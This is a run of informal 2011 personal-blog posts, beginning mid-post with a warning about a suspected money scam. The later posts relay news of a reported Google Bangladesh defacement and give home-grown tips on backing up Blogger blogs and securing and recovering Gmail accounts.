What is the purpose of showing you the message, If you have got such a call or message you can recognize the numbers easily. Girl called me didn't asked me my name, address and city also, she was just insisting for the money. Do you think site looks a legitimate website, If you i must say you are a jackass. Hey guys if you have plenty of money please join this offer and tell me if it is not fake , i want to join it but not ready to take risk. I am not getting anything from my website ads so i also like to earn instant money. If you are from hyderabad and reading this post please investigate and if you found any type of fraud please inform the police. Enjoy

BDNews24 says Hackers have broken into the Bangladesh site of leading search engine Google

2011-01-08T09:59:00.000-08:00

Hey friends, I just got this news from my friend that google bangladesh has been defaced by a hacker.
He told me to read full news at BDNews24.com , I was shocked and tried to open site.

"Dhaka, Jan 8 (bdnews24.com)—Hackers have broken into the Bangladesh site of leading search engine Google, internet service experts said Saturday evening.

The site is inaccessible from some ISPs, but surfers with GP and CityCell connections are still accessing it.

"The site has definitely been hacked," said Pradip Dey, chief technical officer of ADN, a leading ISP.

"A couple of other ISPs have also got similar complaints from their clients," he said.

Earlier, privately managed International Internet Gateway operator, Mango Teleservices, said they can enter google.com.bd.

"I can access it from here. But, many are calling us about this problem."

Attempts to access the site by users are rebounded with message reading," Google Bangladesh OwN3D by TiGER-M@TE." From bdnews24.com

Well after that i searched google for other news sources and i found information at techcrunch.

Tech crunch reports that Google bangladesh is functioning properly and not defaced by anyone.

3 Mb Blogger backup plan to avoid hacking attempts

2011-01-08T03:22:00.000-08:00

Hi friends, If you love Google and using its free services like Blogger you need to think about your password security and nothing else. Today when i was searching a blog for some marketing purpose i did't found it , so i searched it on Google and got a message from another site" Blog is hacked by ******* ".

That blog was hosted at Blogger. So i decided to write a post on blogger security.
With blogger if there will be any vulnerability found, Google will take instant action. But if you lose your password , getting access of your blog again will be a difficult thing. you can read my previous post about Google account security. After taking all precautions if your blog get hacked by some one, what will you do? If your blog is new and using blogspot sub domain, you can think about a new blog. But if it is old and popular and you use it to connect with your friends, fans or for some business purpose you feel disappointed . Reputation matterz yar....................
To avoid such type of hacking attempt i have made a 3 mb blogger backup plan-
Most of the bloggers login once in a day to post or to check stats, keep your eyes open if you found anything unusual.
Whenever you edit your blog HTML or add a new widget download a copy of your template, if you are using a heavy template it will be maximum 512 Kb or less

If you publish a new post instantly download or export your blog, if you have posted 200 articles your blog size will be maximum 2.5 Mb or less

If possible and your memory is not week change your password in a week.
Moderate all comments and use word verifications for comments.
Now if someone hack and delete your blog immediately contact google via its blogger navbar and your domain service provider to stop publishing your blog at that domain.
If you permanently lose access of your blog, you can import your downloaded blog to any other cms or at blogger also but if using a domain you need to contact your service provider for further information.
Now what it takes to secure your blog- Total 3 MB download only.

Steps to ensure that your Gmail account stays in your hands-2

2011-01-05T10:52:00.000-08:00

Hi everyone, what's going on? And I want to say sorry to one of my friend. I got her mail two days before. She told me that someone has hacked her Gmail account, And her facebook, orkut, paypal are also associated with that. Hacker has taken total control of all three accounts including paypal and changed all password recovery options. I said her to send details but she was unable to tell me anything because she never thought this can happen with her. I tried hard to recover her account but because of less details it was not possible.

If your G-mail account get hacked , what you will do? I think you will try to contact support or fill this form.
https://www.google.com/support/accounts/bin/request.py?hl=en&contact_type=acc_reco&ara=2&ctx=acc_reco&rd=1 But if you don't have details this trick will not work and you need to hack your own account to take your ownership back from him. I think after this line you are thinking about old war movies where a king fights for his kingdom. So need not to daydreaming .
Steps to collect details-
Date of making account-Note down when you made your g-mail account, After creating G-mail or Google account if you use orkut, blogger, picasa, adsense, youtube Do remember or note when you start using these services with your Google account.
Frequently used E-mail address- Five frequently contacted e-mail ID's, You can do this by remembering important ID's or by taking a regular backup of your contacts.
Your profile ID's- If using blogger your blog ID , for Orkut orkut profile url, your blog's urls, Blogger's profile url.
Last login- You need to remember last login date, time and password you used.
Security mesures for webmasters using blogger- If you lose your google account , you can't access your blogger dashboard and hacker can also delete your blog. A small mistake can spoil your hard work. So you need to make strong passwords, and use all instruction mentioned above. If possible use a seprate Google account for blogger that doesn't have Gmail or Orkut associated with it and never share your Google account ID with anyone. Make sure your blog have two admins. So if you lose one of your account you can instantly remove hacked account from your blog. If a hacking attempt happens , immediately change your passwords and revoke hacked account's admin privileges. You can read old entries about gmail security Here
Folks i have something to share with you, do you know how many visitors we have daily and value of site HackTheWorld , Just look in the screenshot below